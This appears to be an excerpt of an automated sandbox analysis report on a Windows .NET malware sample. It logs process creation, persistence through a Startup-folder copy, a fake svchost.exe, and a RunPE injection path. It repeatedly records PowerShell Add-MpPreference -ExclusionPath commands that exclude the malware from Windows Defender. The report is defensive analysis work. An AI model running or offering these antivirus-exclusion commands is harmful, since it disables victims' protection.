                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,6_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,7_2_00408FC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499fJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,6_2_004095FD
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2244
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                      Source: VknMvPoCXZ.exe, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 481F404B.exe.1.dr, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.1.dr, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.481F404B.exe.a50000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VknMvPoCXZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VknMvPoCXZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: VknMvPoCXZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002udio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: osymbols\dll\System.Windows.Forms.pdbvH source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.PDBm source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbPROCESSOR_ARCHITEW6432=AMD64 source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe
                      Source: Binary string: ndel\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb9- source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: ease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe\??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
